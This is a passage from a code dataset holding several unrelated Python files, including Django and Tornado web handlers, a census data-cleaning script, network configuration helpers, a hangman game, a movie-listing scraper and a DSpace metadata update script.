'https://')) and\n a['href'].endswith('/ubuntu/')):\n # Try to figure out the mirror's reported latency.\n last_updated = None\n text = u''.join(tr.findAll(text=True))\n for status_label, num_seconds in UBUNTU_MIRROR_STATUSES:\n if status_label in text:\n last_updated = num_seconds\n break\n # Add the mirror to our overview.\n mirrors.add(CandidateMirror(\n mirror_url=a['href'],\n last_updated=last_updated,\n ))\n # Skip to the next row.\n break\n if not mirrors:\n raise Exception(\"Failed to discover any Ubuntu mirrors! (using %s)\" % UBUNTU_MIRRORS_URL)\n logger.info(\"Discovered %s in %s.\", pluralize(len(mirrors), \"Ubuntu mirror\"), timer)\n return mirrors\n\n\ndef generate_sources_list(mirror_url, codename,\n suites=DEFAULT_UBUNTU_SUITES,\n components=VALID_UBUNTU_COMPONENTS,\n enable_sources=False):\n \"\"\"\n Generate the contents of ``/etc/apt/sources.list`` for an Ubuntu system.\n\n :param mirror_url: The base URL of the mirror (a string).\n :param codename: The codename of the Ubuntu release (a string like 'trusty' or 'xenial').\n :param suites: An iterable of strings (defaults to\n :data:`DEFAULT_UBUNTU_SUITES`, refer to\n :data:`VALID_UBUNTU_SUITES` for details).\n :param components: An iterable of strings (refer to\n :data:`VALID_UBUNTU_COMPONENTS` for details).\n :param enable_sources: :data:`True` to include ``deb-src`` entries,\n :data:`False` to omit them.\n :returns: The suggested contents of ``/etc/apt/sources.list`` (a string).\n \"\"\"\n lines = []\n directives = ('deb', 'deb-src') if enable_sources else ('deb',)\n for suite in suites:\n for directive in directives:\n lines.append(format(\n '{directive} {mirror} {suite} {components}', directive=directive,\n mirror=(UBUNTU_SECURITY_URL if suite == 'security' else mirror_url),\n suite=(codename if suite == 'release' else codename + '-' + suite),\n components=' '.join(components),\n ))\n return '\\n'.join(lines)\n","sub_path":"apt_mirror_updater/backends/ubuntu.py","file_name":"ubuntu.py","file_ext":"py","file_size_in_byte":7242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"311175398","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom . import store\n\n\ndef index(request):\n return render(request, 'index.html')\n\n\ndef logout_request(request):\n store.removeUser(request.session[\"user\"]);\n request.session[\"user\"] = None;\n return render(request=request,\n template_name=\"index.html\")\n\n\ndef login_request(request):\n if request.method == 'POST':\n username = request.POST.get('user_name')\n if (store.isUserPresent(username)):\n print(username + \" already present\")\n return render(request,\n \"index.html\",\n {\"error\": True})\n else:\n print(username + \" is not not present, inserting\")\n store.addUser(username);\n request.session[\"user\"] = username;\n return render(request,\n \"home.html\",\n {\"user\": username})\n","sub_path":"Calculations/CalcAssessment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"413972635","text":"#!/usr/bin/env python\n# _*_ coding:utf-8 _*_\n__author__ = \"BIGNI\"\n__date__ = \"2017/4/29 16:34\"\nimport traceback\n\nfrom django.views.generic import View\n\nfrom .models import Host\n\n\nclass ClientHandler(View):\n #初始化\n def __init__(self,client_id):\n self.client_id = client_id\n #client配置\n self.client_configs = {\n \"services\":{}\n }\n\n\n def fetch_configs(self):\n\n try:\n\n host_obj_id = Host.objects.get(id=self.client_id)\n print(\">>>>>>>>>\",host_obj_id)\n #获取模板list\n template_list = list(host_obj_id.templates.select_related())\n print(\">>>>\",template_list)\n #获取主机组obj\n\n # host_group_obj = host_obj_id.host_groups.select_related()\n #把主机组下的目标添加进来\n for host_group in host_obj_id.host_groups.select_related():\n template_list.extend(host_group.templates.select_related())\n print(\"--->\",template_list)\n #获取服务列表\n for template in template_list:\n for service in template.services.select_related():\n print(service)\n #获取插件名和间隔时间\n self.client_configs['services'][service.name] = [service.plugin_name,service.interval]\n\n except:\n traceback.print_exc()\n return self.client_configs\n\n","sub_path":"apps/monitor/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"143755518","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 12 00:15:49 2019\n\n@author: dusty\n\nDustin Burnham\nData Science 400\n2/12/2019\nMilestone Project 2: Data Preparation\n\"\"\"\n\nfrom sklearn.preprocessing import MinMaxScaler\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# 1. Read in the data from a freely available source on the internet. \nurl = 'https://archive.ics.uci.edu/ml/machine-learning-databases/adult/adult.data'\nnames = ['age', 'workclass', 'fnlwgt', 'education', 'education-num', 'marital-status',\n 'occupation', 'relationship', 'race', 'sex', 'capital-gain', 'capital-loss',\n 'hours-per-week', 'native-country', 'income']\n\ncensus = pd.read_csv(url, header=None)\n\n# Assign names\ncensus.columns = names\n\n# 2. Account for outlier values in numeric columns (at least 1 column).\n# Replace outliers for age with the median.\ndef replace_outliers(df, col):\n \"\"\"\n Input: dataframe\n Output: dataframe where the outliers have been replaced by the median of \n that column.\n \n I will check to see which values meet the conditions that they fall\n between +- 2 standardard deviations of the means. i will use the tilda\n to pick out the outliers and replace them with the median.\n \"\"\"\n \n high = np.mean(df[col]) + 2 * np.std(df[col])\n low = np.mean(df[col]) - 2 * np.std(df[col])\n FlagGood = (df.loc[:, col] < high) & (df.loc[:, col] > low)\n df.loc[~FlagGood,col] = np.median(df[col])\n return(df)\n \ncensus = replace_outliers(census, \"age\")\n\n# 3. Replace missing numeric data (at least 1 column).\n# Replace missing numeric data from the hours-per-week attribute\n# with the median hours worked per week.\ndef replace_median(df, col):\n \"\"\"\n Input: dataframe, column where values will be replaced. \n Output: dataframe with median values replacing the missing values.\n \n First we will coerce the column to be numeric, where all errors\n wll be replace with a nan. Next we find the missing values using the\n np.isnan() function which returns a boolean array that picks out those values.\n Finally we replace those nan's with the median of the non-missing entries.\n \"\"\"\n df.loc[:, col] = pd.to_numeric(df.loc[:, col], errors='coerce')\n HasNan = np.isnan(df.loc[:,col])\n df.loc[HasNan, col] = np.nanmedian(df.loc[:, col])\n return(df)\n \ncensus = replace_outliers(census, \"hours-per-week\")\n\n# After replacing missing numerical values in hours-per-week, I will remove the \n# remaining \"?\" values by replacing them with nan and then using the dropna\n# function to remove all rows with any nan.\ncensus = census.replace(\" ?\", float(\"nan\"))\ncensus = census.dropna(axis=0)\n\n# 4. Normalize numeric values (at least 1 column, but be consistent with numeric data).\n# I will normalize the age and hours column for plotting on a histogram.\n# All values will be between 0 and 1.\ndef MinMaxNorm(df, col):\n \"\"\"\n Input: dataframe name, column name\n Output: Array of normalized values using (x - max(x))/(max(x) - min(x))\n formula to feature scale the column.\n \"\"\"\n \n col_tmp = df.loc[:, col]\n MinMax = (col_tmp - min(col_tmp)) / (max(col_tmp) - min(col_tmp))\n return(MinMax)\n \nMinMaxAge = MinMaxNorm(census, 'age')\nMinMaxHours = MinMaxNorm(census, 'hours-per-week')\n\ncensus.loc[:, \"min-max-age\"] = MinMaxAge\ncensus.loc[:, \"min-max-hours\"] = MinMaxHours\n\n#plt.hist(MinMaxAge)\n#plt.hist(MinMaxHours)\n\n# 5. Bin numeric variables (at least 1 column).\n# I will bin age into young, middle-aged, and senior buckets. This\n# will turn numerical data into categorical data. Column will be replaced.\nage = census.loc[:, 'age']\n\n# Determine boundaries\nbins = 3\nBinWidth = (max(age) - min(age)) / bins\nMinBin1 = float('-inf')\nMaxBin1 = min(age) + BinWidth\nMaxBin2 = min(age) + 2 * BinWidth\nMaxBin3 = float('inf')\n\n# Assign values to new bins. Replace former age column with new values.\neqBinnedAge = np.empty(len(age), object)\neqBinnedAge[(MinBin1 < age) & (age <= MaxBin1)] = \"young\"\neqBinnedAge[(MaxBin1 < age) & (age <= MaxBin2)] = \"middle-aged\"\neqBinnedAge[(MaxBin2 < age) & (age <= MaxBin3)] = \"senior\"\n\ncensus.loc[:, 'age'] = eqBinnedAge\n\n# 6. Consolidate categorical data (at least 1 column).\n# Consolidate marital-status into married or not married.\nmarried = census.loc[:, 'marital-status']\nMarriedOrNot = np.empty(len(married), object)\nMarriedOrNot[married == \" Married-civ-spouse\"] = 'Married'\nMarriedOrNot[married != \" Married-civ-spouse\"] = 'Not Married'\ncensus.loc[:, 'marital-status'] = MarriedOrNot\n\n# 7. One-hot encode categorical data with at least 3 categories (at least 1 column).\n# One hot encode the race categorical variable, giving each race its own\n# attribute of 1s and 0s for analsis.\ncensus.loc[:, \"White\"] = (census.loc[:, \"race\"] == \" White\").astype(int)\ncensus.loc[:, \"Black\"] = (census.loc[:, \"race\"] == \" Black\").astype(int)\ncensus.loc[:, \"Asian-Pac-Islander\"] = (census.loc[:, \"race\"] == \" Asian-Pac-Islander\").astype(int)\ncensus.loc[:, \"Amer-Indian-Eskimo\"] = (census.loc[:, \"race\"] == \" Amer-Indian-Eskimo\").astype(int)\ncensus.loc[:, \"Other\"] = (census.loc[:, \"race\"] == \" Other\").astype(int)\n\n# 8. Remove obsolete columns (race). Other columns like marital status and\n# age were overwritten.\ncensus = census.drop(\"race\", axis=1)\n\n# Return the new dataframe as a csv in the current working directory\n# with the following filename.\nfilename = 'DustinBurnham-M02-Dataset.csv'\ncensus.to_csv(filename)","sub_path":"DustinBurnham-M02-Script.py","file_name":"DustinBurnham-M02-Script.py","file_ext":"py","file_size_in_byte":5472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"404551866","text":"\"\"\"Common configure functions for dhcpv6\"\"\"\r\n\r\n# Python\r\nimport logging\r\n\r\n# Unicon\r\nfrom unicon.core.errors import SubCommandFailure\r\n\r\nlog = logging.getLogger(__name__)\r\n\r\n\r\ndef create_dhcp_pool_ipv6(device, pool_name, ipv6_prefix, lifetime, pref_lifetime):\r\n \"\"\" Create DHCP IPv6 pool\r\n Args:\r\n device ('obj'): device to use\r\n pool_name ('str'): name of the pool to be created\r\n ipv6_prefix ('str'): IPv6 prefix\r\n lifetime ('int'): lifetime in seconds\r\n pref_lifetime ('int'): preferred lifetime in seconds\r\n Returns:\r\n None\r\n Raises:\r\n SubCommandFailure: Failed creating IPv6 DHCP pool\r\n \"\"\"\r\n log.info(\r\n \"Configuring IPv6 DHCP pool with name={pool_name}, ipv6_prefix={ipv6_prefix}, lifetime={lifetime}, and \"\r\n \"Preferred Lifetime {pref_lifetime} \".format(pool_name=pool_name, ipv6_prefix=ipv6_prefix, lifetime=lifetime, pref_lifetime=pref_lifetime)\r\n )\r\n\r\n try:\r\n device.configure(\r\n [\r\n \"ipv6 dhcp pool {pool_name}\".format(pool_name=pool_name),\r\n\t \"address prefix {ipv6_prefix} lifetime {lifetime} {pref_lifetime}\".format(ipv6_prefix=ipv6_prefix, lifetime=lifetime, pref_lifetime=pref_lifetime)\r\n ]\r\n )\r\n\r\n except SubCommandFailure:\r\n raise SubCommandFailure(\r\n \"Could not configure IPv6 DHCP pool {pool_name}\".format(\r\n pool_name=pool_name\r\n )\r\n )\r\n\r\ndef remove_dhcp_pool_ipv6(device, pool_name):\r\n \"\"\" Remove DHCP IPv6 pool\r\n Args:\r\n device ('obj'): device to use\r\n pool_name ('str'): name of the pool to be created\r\n Returns:\r\n None\r\n Raises:\r\n SubCommandFailure: Failed removing IPv6 DHCP pool\r\n \"\"\"\r\n log.info(\r\n \"Removing IPv6 DHCP pool with name={pool_name}\".format(pool_name=pool_name)\r\n )\r\n\r\n try:\r\n device.configure(\r\n [\r\n \"no ipv6 dhcp pool {pool_name}\".format(pool_name=pool_name),\r\n ]\r\n )\r\n\r\n except SubCommandFailure:\r\n raise SubCommandFailure(\r\n \"Could not remove IPv6 DHCP pool {pool_name}\".format(\r\n pool_name=pool_name\r\n )\r\n )\r\n\r\n\r\n","sub_path":"pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/dhcpv6/configure.py","file_name":"configure.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"313617666","text":"from .exceptions import *\nimport random\n\nclass GuessAttempt(object):\n def __init__(self, letter, hit=None, miss=None):\n self.letter = letter\n self.hit = hit\n self.miss = miss\n if self.hit and self.miss:\n raise InvalidGuessAttempt()\n \n def is_hit(self):\n if self.hit:\n return self.hit\n return False\n\n def is_miss(self):\n if self.miss:\n return self.miss\n return False\n \n \n \nclass GuessWord(object):\n def __init__(self, word):\n self.answer = word\n self.masked = '*' * len(word)\n\n if not word:\n raise InvalidWordException()\n \n def uncover_word(self, guess):\n \n masked_list = list(self.masked)\n index_to_switch = []\n masked_string = self.masked\n answer_lower = self.answer.lower()\n if guess in answer_lower:\n for ind, letter in enumerate(answer_lower):\n if guess == letter:\n index_to_switch.append(ind)\n for item in index_to_switch:\n masked_list[item] = guess\n masked_string = ''.join(masked_list)\n \n return masked_string\n \n def perform_attempt(self, guess):\n guess = guess.lower()\n if len(guess) > 1:\n raise InvalidGuessedLetterException()\n \n if guess in self.answer.lower():\n hit_or_miss = GuessAttempt(guess, hit = True)\n self.masked = self.uncover_word(guess)\n else:\n hit_or_miss = GuessAttempt(guess, miss = True)\n return hit_or_miss\n \n\n \n \n \nclass HangmanGame(object):\n WORD_LIST = ['rmotr', 'python', 'awesome']\n \n def __init__(self, words = None, number_of_guesses = 5):\n \n if words == None:\n words = self.WORD_LIST\n \n self.remaining_misses = number_of_guesses\n random_word = self.select_random_word(words)\n self.word = GuessWord(random_word)\n self.previous_guesses = []\n \n def is_won(self):\n return self.word.masked == self.word.answer\n\n def is_lost(self):\n return self.remaining_misses == 0\n\n def is_finished(self):\n return self.is_won() or self.is_lost()\n\n def guess(self, letter):\n letter = letter.lower()\n if letter in self.previous_guesses:\n raise InvalidGuessedLetterException()\n if self.is_finished():\n raise GameFinishedException()\n \n self.previous_guesses.append(letter.lower())\n guess_attempt = self.word.perform_attempt(letter)\n \n if guess_attempt.is_miss():\n self.remaining_misses -= 1\n \n if self.is_won():\n raise GameWonException()\n\n if self.is_lost():\n raise GameLostException()\n\n return guess_attempt\n \n\n \n\n @classmethod\n def select_random_word(cls, list):\n if not list:\n raise InvalidListOfWordsException()\n return random.choice(list)\n \n \n","sub_path":"hangman/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"334326042","text":"#!/bin/python\n\n# Services exposed by the VM Manager\n# The REST url :\n# http://host-name/api/1.0/disk-usage\n# http://host-name/api/1.0/running-time\n# http://host-name/api/1.0/mem-usage\n# http://host-name/api/1.0/running-processes\n# http://host-name/api/1.0/cpu-load\n# http://host-name/api/1.0/execute/\n\nimport urlparse\nimport os\nimport os.path\nimport json\nimport requests\n\n# tornado imports\nimport tornado.httpserver\nimport tornado.ioloop\nimport tornado.options\nimport tornado.web\nfrom tornado.options import define, options\n\n# ADS imports\nfrom __init__ import *\nfrom httplogging.http_logger import logger\nfrom utils.envsetup import EnvSetUp\nfrom controller import Controller\nfrom config import authorized_users\n\n\ndefine(\"port\", default=8000, help=\"run on the given port\", type=int)\n\n\nclass BaseHandler(tornado.web.RequestHandler):\n def get_current_user(self):\n return self.get_secure_cookie(\"user\")\n\n\nclass MainHandler(BaseHandler):\n \"\"\"\n Main Handler is to handle the index page for ControllerServer\n \"\"\"\n def get(self):\n if not self.current_user:\n self.redirect('/login')\n else:\n self.render('index.html')\n\n def post(self):\n if not self.current_user:\n self.redirect('/login')\n return\n\n post_data = dict(urlparse.parse_qsl(self.request.body))\n c = Controller()\n # log the user who is deploying the lab..\n logger.debug(\"Lab Deployment: deployed by: %s, lab id: %s, URL: %s\" %\n (self.current_user,\n post_data['lab_id'],\n post_data['lab_src_url']))\n\n self.write(c.test_lab(self.current_user, post_data['lab_id'],\n post_data['lab_src_url'],\n post_data.get('version', None)))\n\n\nclass LoginHandler(BaseHandler):\n \"\"\"\n LoginHandler will handle logins at /login\n \"\"\"\n\n def get(self):\n self.render('login.html')\n\n def post(self):\n msg = \"LoginHandler: Authenticating and authorizing using Persona..\"\n logger.debug(msg)\n assertion = self.get_argument(\"assertion\")\n\n if not assertion:\n logger.debug(\"Assertion not passed by the client. Aborting.\")\n self.write_error(400)\n return\n\n data = {'assertion': assertion,\n 'audience': config_spec[\"CONTROLLER_CONFIG\"][\"APP_URL\"]}\n\n # make the auth request to persona\n resp = requests.post(\n config_spec[\"CONTROLLER_CONFIG\"][\"PERSONA_VERIFIER\"],\n data=data, verify=True)\n\n if not resp.ok:\n logger.debug(\"Response from Persona is malformed. Aborting auth.\")\n self.write_error(500)\n return\n\n verified_data = json.loads(resp.content)\n logger.debug(\"Verified data from Persona: %s\" % verified_data)\n\n if verified_data['status'] != 'okay':\n logger.debug(\"Persona returned error. Aborting authentication.\")\n self.write_error(500)\n return\n\n user_email = verified_data['email']\n # user exists in our set of authorized users\n if user_email in authorized_users.users:\n logger.debug(\"Authentication and authorization successful!\")\n self.set_secure_cookie('user', user_email)\n self.write({'status': 'okay', 'msg': \"Successful login\"})\n # user does not exist. Send unauthorized error.\n else:\n logger.debug(\"User: %s is not authorized. Aborting.\" % user_email)\n msg = \"Oops! You are not authorized to deploy a lab.
    \"\n msg += \"Please contact admin for details.\"\n self.write({'status': 'error', 'msg': msg})\n\n\nclass LogoutHandler(BaseHandler):\n \"\"\"\n LogoutHandler will handle logouts at /logout\n \"\"\"\n\n def post(self):\n self.clear_cookie('user')\n self.write({'status': 'okay', 'msg': 'logged out'})\n\n\nif __name__ == \"__main__\":\n env = EnvSetUp.Instance()\n config_spec = env.get_config_spec()\n tornado.options.parse_command_line()\n app = tornado.web.Application(\n handlers=[\n (r\"/\", MainHandler),\n (r\"/login\", LoginHandler),\n (r\"/logout\", LogoutHandler)\n ],\n template_path=os.path.join(os.path.dirname(__file__), \"templates\"),\n static_path=os.path.join(os.path.dirname(__file__), \"static\"),\n cookie_secret=config_spec[\"CONTROLLER_CONFIG\"][\"COOKIE_SECRET\"],\n debug=True)\n\n http_server = tornado.httpserver.HTTPServer(app)\n options.port = config_spec[\"CONTROLLER_CONFIG\"][\"SERVER_PORT\"]\n logger.debug(\"ControllerServer: It will run on port : \" + str(options.port))\n http_server.listen(options.port)\n tornado.ioloop.IOLoop.instance().start()\n","sub_path":"src/controller_server.py","file_name":"controller_server.py","file_ext":"py","file_size_in_byte":4813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"230137235","text":"import itertools\nfrom random import randint, choice\n\nfrom sqlalchemy.orm import sessionmaker\n\nfrom mapper.mapper import User, Event, RawData, Processing, engine\n\nSession = sessionmaker(bind=engine)\nsession = Session()\n\nif session.query(RawData).first():\n print('Test data already generated')\n quit()\n\n\nprint('Creating Users & Events')\nfor n in range(1000):\n session.add(User())\n session.add(Event())\nsession.commit()\nprint('1000 User & Event created')\n\n\nlines_count = randint(90000, 100000)\nprint('Start creating {} RawData'.format(lines_count))\n\n\nsequence = [x for x in itertools.combinations([i for i in range(1, 1000)], 2)]\nfor n in range(lines_count):\n pair = choice(sequence)\n session.add(RawData(amount=randint(-100000, 100000), event_id=pair[0], user_id=pair[1]))\n sequence.remove(pair)\n\nsession.commit()\n\nprint('Finish creating test data')\n","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"258915713","text":"# 导入相关库\r\nimport requests\r\nfrom lxml import etree\r\n#from openpyxl import workbook # 写入Excel表所用\r\n#from openpyxl import load_workbook # 读取Excel表所用\r\nfrom bs4 import BeautifulSoup as bs\r\nimport xlwt\r\nimport os\r\nprint(os.getcwd())\r\n#os.chdir('C:\\Users\\19652\\Desktop') # 更改工作目录为桌面\r\nfb=open('豆瓣电影.txt','w',encoding='utf-8')\r\n# 1.将目标网页的内容请求下来\r\nheaders = {\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36\",\r\n \"Referer\": \"https://www.douban.com/\"\r\n}\r\ndouban_url = \"https://movie.douban.com/cinema/nowplaying/xian/\"\r\nresponse = requests.get(douban_url, headers=headers)\r\ndouban_text = response.text\r\n\r\n# 2.将抓取的数据进行处理\r\nhtml_element = etree.HTML(douban_text)\r\nul = html_element.xpath('//ul[@class=\"lists\"]')[0]\r\nlis = ul.xpath('./li')\r\nmovies = []\r\ntitles=[]\r\nscores=[]\r\nstars=[]\r\ndurations=[]\r\nregions=[]\r\ndirectors=[]\r\nactorss=[]\r\nposts=[]\r\nfor li in lis:\r\n title = li.xpath('./@data-title')[0]\r\n score = li.xpath('./@data-score')[0]\r\n star = li.xpath('./@data-star')[0]\r\n duration = li.xpath('./@data-duration')[0]\r\n region = li.xpath('./@data-region')[0]\r\n director = li.xpath('./@data-director')[0]\r\n actors = li.xpath('./@data-actors')[0]\r\n post = li.xpath('.//img/@src')[0]\r\n movie = {\r\n \"title\": title,\r\n \"score\": score,\r\n \"star\": star,\r\n \"duration\": duration,\r\n \"region\": region,\r\n \"director\": director,\r\n \"actors\": actors,\r\n \"post\": post\r\n }\r\n titles.append(title)\r\n scores.append(score)\r\n stars.append(star)\r\n durations.append(duration)\r\n regions.append(region )\r\n directors.append(director)\r\n actorss.append(actors)\r\n posts.append(post)\r\n movies.append(movie)\r\n rows = ''\r\nfor movie in movies:\r\n #print(movie['title'])\r\n row = '{}{}{}{}{}{}{}'.format(\r\n movie['title'],\r\n movie['score'],\r\n movie['star'],\r\n movie['duration'],\r\n movie['region'],\r\n movie['director'],\r\n movie['actors']\r\n )\r\n # 利用字符串拼接循环存储每个格式化的电影票房信息\r\n rows = rows + '\\n' + row # 利用字符串拼接处格式化的HTML页面\r\n piaofang_html = ''' \r\n \r\n 豆瓣电影 \r\n 豆瓣电影\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ''' \\\r\n + rows + '''
    电影名评分星级时长地区导演演员
    '''\r\n # 存储已经格式化的html页面\r\nwith open('douban.html', 'w', encoding='utf-8') as f :\r\n f.write(piaofang_html)\r\n#fb=open('豆瓣电影.xlsx','w',encoding='utf-8')\r\n#ws.append(['电影名', '评分', '五角星', '时长','国家/地区','导演', '主演', '海报'])\r\n\r\n # 读取存在的Excel表测试\r\n # wb = load_workbook('test.xlsx') #加载存在的Exce\r\nimport xlwt\r\nbook = xlwt.Workbook(encoding='utf-8',style_compression=0)\r\nsheet = book.add_sheet('mysheet',cell_overwrite_ok=True)\r\nmovies_info=[\"电影名\", \"评分\", \"五角星\",\"时长\",\"国家/地区\",\"导演\", \"主演\", \"海报\"]\r\nfor j in range(8):\r\n sheet.write(0,j,movies_info[j])\r\n\r\nfor i in range(len(titles)):\r\n sheet.write(i+1,0,titles[i])\r\n sheet.write(i+1,1,scores[i])\r\n sheet.write(i+1,2,stars[i])\r\n sheet.write(i+1,3,durations[i])\r\n sheet.write(i + 1, 4, regions[i])\r\n sheet.write(i + 1, 5, directors[i])\r\n sheet.write(i + 1, 6, actorss[i])\r\n sheet.write(i + 1, 7, posts[i])\r\nprint(\"结束\")\r\nbook.save('douban.xls')","sub_path":"猫眼爬虫/douban.py","file_name":"douban.py","file_ext":"py","file_size_in_byte":5865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"31082608","text":"import json\nimport requests\nimport secrets\nimport time\nimport csv\nfrom datetime import datetime\nimport urllib3\nimport argparse\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nsecretsVersion = input('To edit production server, enter the name of the secrets file: ')\nif secretsVersion != '':\n try:\n secrets = __import__(secretsVersion)\n print('Editing Production')\n except ImportError:\n print('Editing Stage')\nelse:\n print('Editing Stage')\n\nbaseURL = secrets.baseURL\nemail = secrets.email\npassword = secrets.password\nfilePath = secrets.filePath\nverify = secrets.verify\nskippedCollections = secrets.skippedCollections\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-f', '--fileName', help='the CSV file of changes. optional - if not provided, the script will ask for input')\nargs = parser.parse_args()\n\nif args.fileName:\n fileName = args.fileName\nelse:\n fileName = input('Enter the file name of the CSV of changes (including \\'.csv\\'): ')\n\nstartTime = time.time()\ndata = {'email': email, 'password': password}\nheader = {'content-type': 'application/json', 'accept': 'application/json'}\nsession = requests.post(baseURL+'/rest/login', headers=header, verify=verify, params=data).cookies['JSESSIONID']\ncookies = {'JSESSIONID': session}\nheaderFileUpload = {'accept': 'application/json'}\ncookiesFileUpload = cookies\nstatus = requests.get(baseURL+'/rest/status', headers=header, cookies=cookies, verify=verify).json()\nprint('authenticated')\n\n\ndt_stamp = datetime.now().strftime('%Y-%m-%d %H.%M.%S')\n\nf = csv.writer(open('replacedKeyValuePair'+dt_stamp+'.csv', 'w'))\nf.writerow(['handle']+['itemID']+['oldKey']+['newKey']+['oldValue']+['newValue']+['delete']+['post'])\n\nf2 = csv.writer(open('notReplacedKeyValuePair'+dt_stamp+'.csv', 'w'))\nf2.writerow(['uri']+['oldKey']+['newKey']+['oldValue']+['newValue'])\n\nvalues_changed = 0\nvalues_unchanged = 0\nrow_count = 0\n\nwith open(fileName) as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n row_count = row_count + 1\n uri = row['uri']\n uri = uri[28:]\n print(uri)\n oldKey = row['oldKey']\n newKey = row['newKey']\n oldValue = row['oldSubject']\n newValue = row['newSubject']\n if (oldValue != newValue) or (oldKey != newKey):\n uri_request = requests.get(baseURL+'/rest/'+uri, headers=header, cookies=cookies, verify=verify).json()\n itemLink = uri_request['link']\n metadata = requests.get(baseURL+itemLink+'/metadata', headers=header, cookies=cookies, verify=verify).json()\n itemMetadataProcessed = []\n for l in range(0, len(metadata)):\n metadata[l].pop('schema', None)\n metadata[l].pop('element', None)\n metadata[l].pop('qualifier', None)\n languageValue = metadata[l]['language']\n if metadata[l]['key'] == oldKey and metadata[l]['value'] == oldValue:\n updatedMetadataElement = {}\n updatedMetadataElement['key'] = newKey\n updatedMetadataElement['value'] = newValue\n updatedMetadataElement['language'] = languageValue\n itemMetadataProcessed.append(updatedMetadataElement)\n\n provNote = '\\''+oldKey+': '+oldValue+'\\' was replaced by \\''+newKey+': '+newValue+'\\' through a batch process on '+dt_stamp+'.'\n provNoteElement = {}\n provNoteElement['key'] = 'dc.description.provenance'\n provNoteElement['value'] = provNote\n provNoteElement['language'] = 'en_US'\n itemMetadataProcessed.append(provNoteElement)\n else:\n if metadata[l] not in itemMetadataProcessed:\n itemMetadataProcessed.append(metadata[l])\n itemMetadataProcessed = json.dumps(itemMetadataProcessed)\n delete = requests.delete(baseURL+itemLink+'/metadata', headers=header, cookies=cookies, verify=verify)\n print(delete)\n post = requests.put(baseURL+itemLink+'/metadata', headers=header, cookies=cookies, verify=verify, data=itemMetadataProcessed)\n print(post)\n f.writerow([uri]+[itemLink]+[oldKey]+[newKey]+[oldValue]+[newValue]+[delete]+[post])\n if post.status_code == 200:\n values_changed = values_changed + 1\n else:\n values_unchanged = values_unchanged + 1\n else:\n f2.writerow([uri]+[oldKey]+[newKey]+[oldValue]+[newValue])\n\nlogout = requests.post(baseURL+'/rest/logout', headers=header, cookies=cookies, verify=verify)\n\n\nprint('Original row count: {}'.format(row_count))\nprint('Total values or keys changed: {}'.format(values_changed))\nprint('Total values unchanged: {}'.format(values_unchanged))\nprint('total: '+(str(values_changed+values_unchanged)))\nelapsedTime = time.time() - startTime\nm, s = divmod(elapsedTime, 60)\nh, m = divmod(m, 60)\nprint('Total script run time: ', '%d:%02d:%02d' % (h, m, s))\n","sub_path":"replaceKeyValuePairsWithHandlesFromCSV.py","file_name":"replaceKeyValuePairsWithHandlesFromCSV.py","file_ext":"py","file_size_in_byte":5076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"534867683","text":"import sys\n\nsys.stdin = open('input_1289.txt', 'r')\n# sys.stdout = open('output_1239.txt', 'w')\n\nT = int(input())\n\nfor t in range(1, T+1):\n m = list(map(int, input()))\n\n r = [0 for _ in range(len(m))]\n\n cnt = 0\n for i in range(len(m)):\n if m[i] != r[i]:\n cnt += 1\n if m[i] == 1:\n for j in range(i, len(m)):\n r[j] = 1\n if m == r:\n break\n elif m[i] == 0:\n for j in range(i, len(m)):\n r[j] = 0\n if m == r:\n break\n print('#{} {}'.format(t, cnt))\n\n","sub_path":"SWEA/1289_원재의메모리복구하기.py","file_name":"1289_원재의메모리복구하기.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"32570991","text":"\n\n#calss header\nclass _RIDDANCE():\n\tdef __init__(self,): \n\t\tself.name = \"RIDDANCE\"\n\t\tself.definitions = [u'said when you are pleased that a bad or unwanted thing or person, or something of poor quality, has gone: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_riddance.py","file_name":"_riddance.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"482316915","text":"\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QPushButton, QTextEdit ,QListWidget ,QTableView ,QComboBox,QLabel,QLineEdit,QTextBrowser\nimport sys ,pickle\nimport data_visualise\nimport table_display\nfrom PyQt5 import uic, QtWidgets ,QtCore, QtGui\nfrom sklearn.model_selection 